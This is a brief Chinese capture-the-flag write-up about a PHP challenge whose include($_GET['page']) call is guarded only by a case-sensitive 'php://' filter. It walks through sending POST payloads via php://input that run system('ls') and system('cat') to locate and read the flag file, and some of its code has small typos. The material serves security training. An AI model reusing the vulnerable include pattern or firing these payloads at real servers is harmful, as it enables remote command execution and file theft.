<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环$page=str_replace("php://", "", $page);//传入空值，替换
}
include($page);
?>

综上分析，get方式好像挺难去看到这个flag的，因为这种代码下的flag通常放在一个文件中，需要先展开ls，然后在cat查看。那我们就尝试用post传参   

准备好一个Firefox  一个max hackbar     

通过php伪协议php://input

首先post传入第一个命令 ，这个命令用来展开目录

<php
system("ls")
?>

随后得到fl4gisisish3r3.php   一般这种文件就是flag，

我们使用

<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上，有的就藏在背后i的代码里，这个就是